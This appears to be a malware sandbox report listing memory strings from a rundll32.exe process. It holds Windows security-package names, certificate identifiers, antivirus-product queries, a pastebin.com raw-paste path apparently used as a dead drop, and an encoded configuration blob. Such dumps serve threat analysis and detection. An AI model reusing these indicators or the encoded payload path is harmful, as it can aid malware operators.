Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: uint32	memstr_66bca0a1-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: timestamp	memstr_b92e0e7b-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: uint32not_nulltimestamp	memstr_59b15461-a
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pk9wr	memstr_ed65c38d-b
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: user-pcroot\securitycenter2	memstr_13f81d33-b
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: windows defender	memstr_4f0e69cf-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {d68ddc3a-831f-4fae-9e44-da132c1acf46}	memstr_5be391a7-c
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %programfiles%\windows defender\msmpeng.exe	memstr_b4c31cd5-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: thu, 05 oct 2023 09:37:28 gmt	memstr_d30c2bdb-8
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antivirusproductwindows defender{d68ddc3a-831f-4fae-9e44-da132c1acf46}windowsdefender://%programfiles%\windows defender\msmpeng.exethu, 05 oct 2023 09:37:28 gmt5	memstr_5006492f-9
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pastebin.com	memstr_dd5ce44a-8
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: negoextender security package	memstr_724d2033-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: negoextender security package2	memstr_0759e54e-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: default tls ssp5	memstr_9e637ec8-c
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pstebin.c&	memstr_92a82eb8-c
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: negoextender)	memstr_31aa2b0d-6
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: schannel security package	memstr_40899b3b-e
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: schannel security package@	memstr_b61f6d94-b
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: schannel security packageq	memstr_9a939cf3-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pstebin.ct	memstr_623f2c45-5
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pstebin.c	memstr_da504be8-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pastebin.comb	memstr_dd39c804-e
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ts service security package	memstr_b6c9c0b9-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft package negotiator	memstr_b26991d9-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: swbemsecurity	memstr_bead7e6c-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \llb+	memstr_9dfc8f51-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v ckm	memstr_3748e8e5-e
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pastebin.comnt:h	memstr_922a5cb4-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: *.pastebin.comw	memstr_5c36ee84-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: windows hardware driver attested verification	memstr_d9f535d5-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\ondemandconnroutehelper.dll	memstr_5a413f61-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: windows hardware driver extended verification	memstr_0a071901-8
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tls-server-end-point	memstr_2c9d1c62-5
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v ckm5 tls-server-end-point	memstr_ccd4172d-a
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: embedded windows system component verificationq	memstr_1d252866-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft unified security protocol provider	memstr_559bb6fd-8
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v ckmr	memstr_01c6f92d-6
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v ckmrogramdataprogr	memstr_76d0a1a0-a
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v ckmt	memstr_26ec93ea-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v ckmtem32\ondemandco	memstr_9d2aeb85-5
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s (x86)\autoit3\autoitxpublic=c:\users\publics	memstr_542589d1-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: onname=consolesystemdrive=c:systemroot=c:\wind	memstr_b6442982-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: temp=c:\users\user\appdata\local\temptmp=c:\use	memstr_c8ceea90-a
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rok\appdata\local\tempuserdomain=user-pcuserdo	memstr_6a25aeaa-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _roamingprofile=brok-pcusername=brokuserprofil	memstr_c2cccfbb-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \users\userwindir=c:\windows	memstr_dcd7554c-1
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: >c:\windows\syswow64\stdole2.tlb	memstr_d8af34a3-2
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $"#\|7	memstr_2929c3c5-5
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &")@:	memstr_9ee5b3ec-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ('nf.	memstr_5cc012d2-5
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bbh#0	memstr_643ebecd-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: inetzzzz	memstr_85de74ca-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.4	memstr_9585ee0e-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.4x962p239v1ecdsacryptoidinfoeccparameters	memstr_52d6ae1a-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.6	memstr_036866ac-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.6x962p239v3ecdhcryptoidinfoeccparameters	memstr_090ac6d6-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: text/plain; charset=utf-8	memstr_c736be37-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: software\policies\microsoft\systemcertificates\trustedpeople	memstr_ec27982f-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: software\policies\microsoft\systemcertificates\trustedpeople8	memstr_88a9214d-1
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.7	memstr_721b9454-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.7x962p256v1ecdhcryptoidinfoeccparameters	memstr_a23c090e-b
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @6og^	memstr_a83d035f-8
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.5	memstr_1b22bb0a-8
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.5x962p239v2ecdhcryptoidinfoeccparameters	memstr_40b9e8cf-6
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.7x962p256v1ecdsacryptoidinfoeccparameters	memstr_ba24fe87-c
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {cwxi	memstr_b0801f57-5
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: =u@l=u	memstr_26a35f78-e
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: >ups=u	memstr_48332a50-c
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 70c50a17-5fb4-415f-b976-2ce9ec638440	memstr_c7e53da5-6
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lmemp	memstr_7b1da943-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %70c50a17-5fb4-415f-b976-2ce9ec638440lmemp	memstr_40de1fab-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.5x962p239v2ecdsacryptoidinfoeccparameters	memstr_f2604683-c
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.6x962p239v3ecdsacryptoidinfoeccparameters	memstr_b52e80b1-b
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /raw/zelzp1yr	memstr_dc83cfb3-6
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.4x962p239v1ecdhcryptoidinfoeccparameters	memstr_4126a1ec-6
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.2	memstr_f2bd07c5-d
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.2x962p192v2ecdsacryptoidinfoeccparameters	memstr_55a282bc-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.2x962p192v2ecdhcryptoidinfoeccparameters	memstr_d5a29685-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.3	memstr_f107520f-9
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.3x962p192v3ecdsacryptoidinfoeccparameters	memstr_1a04f18b-a
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.3x962p192v3ecdhcryptoidinfoeccparameters	memstr_968bac5e-c
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.7secp256r1ecdsacryptoidinfoeccparameters	memstr_58fc9d86-a
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\c:\windows\system32\tenantrestrictionsplugin.dllbt8	memstr_eabf61c0-b
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\ondemandconnroutehelper.dll8	memstr_10fc2aa5-0
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.156.11235.1.1.2.1	memstr_b8f704d7-e
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.156.11235.1.1.2.1ec192wapiecdhcryptoidinfoeccparameters	memstr_406b5afb-7
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.1	memstr_f3c36c11-f
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.1nistp192ecdsacryptoidinfoeccparameters	memstr_85c7eab1-9
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.7nistp256ecdsacryptoidinfoeccparameters	memstr_cb7fc82c-e
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.1secp192r1ecdhcryptoidinfoeccparameters	memstr_bb4998e5-3
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.156.11235.1.1.2.1ec192wapiecdsacryptoidinfoeccparameters	memstr_82ed4805-a
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.7secp256r1ecdhcryptoidinfoeccparameters	memstr_1d50c123-5
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tenantrestrictions\payloadbt8	memstr_927669aa-8
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.1secp192r1ecdsacryptoidinfoeccparameters	memstr_6f03712c-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.1x962p192v1ecdsacryptoidinfoeccparameters	memstr_32dfbe24-c
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.10045.3.1.1x962p192v1ecdhcryptoidinfoeccparameters	memstr_d3a87994-4
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ^^^xouwp4joea0uwbbqifen2y6kmcomqx3gsobg+ewj59fczm00xe/zsgseynm9xft337ppyc65ks+h4crcbigamw==^^^fujbvxtx9qsh7faaacluna==^^^07--02-09^^^3c17xxdct27c2ufsnrpcfq==^^^mrs78u/k4/2ats2gwfcze7gmqsrqbswqdcva5qz/o45eznfvpzmsbrbur7jkqgddperboybgpav8vc8rvyk/xw==^^^ypwz9zmytqxntfhfseklka==^^^	memstr_88ec19dc-3
Source: rundll32.exe, 0000000D.00000003.2070990427.00000000007E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: *~y\user\s-1-5-21-2246122658-3693405117-2476756634-1003\control panel\international\user profile	memstr_97b2fe69-7
Source: rundll32.exe, 0000000D.00000003.3425372897.0000000002961000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \registry\machine\software\classes\wow6432node\clsid\{2087c2f4-2cef-4953-a8ab-66779b670495}\registry\machine\software\classes\wow6432node\clsid\{2087c2f4-2cef-4953-a8ab-66779b670495},gk	memstr_ca6bbca0-c
Source: rundll32.exe, 0000000D.00000003.3425372897.0000000002961000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ~ ^~y\machine\software\classes\clsid\{2087c2f4-2cef-4953-a8ab-66779b670495}	memstr_1146bf1d-f
Source: rundll32.exe, 0000000D.00000003.3413242093.0000000002961000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ~ ^~y\machine\system\currentcontrolset\services\winsock2\parameters	memstr_fb84e765-5
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qqqqqqqqqqqqqqqq	memstr_c26e0d16-4
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qqqqqqqqqqqqqqqqm	memstr_10d2cffc-4
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dasyc	memstr_7e948b1a-c
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ncalrpc	memstr_9adc0842-4
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: negotiate	memstr_3a63573b-5
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pku2u	memstr_0af37bb0-8
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wdigest	memstr_1d962a4e-a
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: schannel	memstr_f76f4c2e-d
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: negoextender	memstr_2dac8198-1
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tsssp	memstr_f54170ae-8
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: default tls ssp	memstr_45e98401-6
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: credssp	memstr_e845f07c-5
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kerberos	memstr_0bde82b4-4
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: asych	memstr_b13e49ce-0
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 647wl	memstr_e930927a-b
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pvcwm	memstr_e9719dee-e
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ncryptsslp.dll	memstr_1d0c57cf-7
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: aw1.2.840.113549.1.1.1	memstr_7edbfae4-5
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ytr[^f"ghk	memstr_cc2c806a-e
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: aw1.2.840.113549.3.7	memstr_743e74c8-3
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lrpc-ee37db743722568fd1	memstr_c501b36b-1
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: aw1.2.840.113549.3.2	memstr_b39e06b3-7
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: aw1.2.840.113549.3.4	memstr_f51e9c11-b
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft kerberos v1.0	memstr_45781225-9
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.113549.1.9.16.1.1	memstr_4101ddb4-2
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.113549.1.9.16.2.1	memstr_74be64c0-5
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ytr[^f"ghk3	memstr_9ddc89b7-7
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft unified security protocol provider	memstr_76addd71-1
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft unified security protocol provider4	memstr_3012f0e3-b
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lrpc-0f0f983ddda573ee35=	memstr_8c79a48e-d
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: essreceiptrequestdecodeex	memstr_682a4ceb-b
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: essreceiptrequestdecodeex&	memstr_d8a5b6bf-e
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.113549.1.9.16.2.11	memstr_e32149cf-1
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.113549.1.9.16.2.11/	memstr_ad4e4635-e
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: esskeyexchpreferencedecodeex	memstr_ddec28ba-9
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: esskeyexchpreferencedecodeexp	memstr_4fbe07ec-0
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.113549.1.9.16.2.12	memstr_46f488e6-c
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.113549.1.9.16.2.12y	memstr_efaca911-6
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lrpc-0f0f983ddda573ee35b	memstr_f84ccd2c-e
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntlm security packagek	memstr_b8682e6c-2
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: https://pastebin.com/l	memstr_c4701543-5
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pku2u security packageg	memstr_acf1ccef-f
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lrpc-0f0f983ddda573ee35h	memstr_7460d65f-d
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lrpc-ee37db743722568fd1o	memstr_b7a14dd9-b
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: asyc8	memstr_3bf3d5d5-5
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dasyc`f	memstr_236b930c-0
Source: rundll32.exe, 0000000D.00000003.3514890180.000000000690C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pvcw/	memstr_c43be21e-f
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 25vanv4sdmc3veafr8s2m3m9u6wrh3p7fdd9t9q10iag5wzj5k5!	memstr_7e11e0a5-e
Source: rundll32.exe, 0000000D.00000002.3753630706.000000000BC6E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: trolh	memstr_153a8ed9-8
Source: rundll32.exe, 0000000D.00000002.3753630706.000000000BC6E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: tls_ecdhe_rsa_with_aes_256_gcm_sha384aes	memstr_72143dd4-3
Source: rundll32.exe, 0000000D.00000002.3753630706.000000000BC6E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: jud{hw	memstr_fdf79e50-6
Source: rundll32.exe, 0000000D.00000002.3753630706.000000000BC6E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: agl`y	memstr_0cc28ee3-6
Source: rundll32.exe, 0000000D.00000002.3753630706.000000000BC6E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: cw@hrwp	memstr_f17613be-c
Source: rundll32.exe, 0000000D.00000002.3753630706.000000000BC6E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: `_u0u	memstr_7f766a69-8
Source: rundll32.exe, 0000000D.00000002.3753630706.000000000BC6E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: pvcw0	memstr_fd0a1c71-9
Source: rundll32.exe, 0000000D.00000002.3753630706.000000000BC6E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: d`cw\	memstr_ce2f2006-0
Source: rundll32.exe, 0000000D.00000002.3753630706.000000000BC6E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: x0x0b	memstr_ad12df03-d
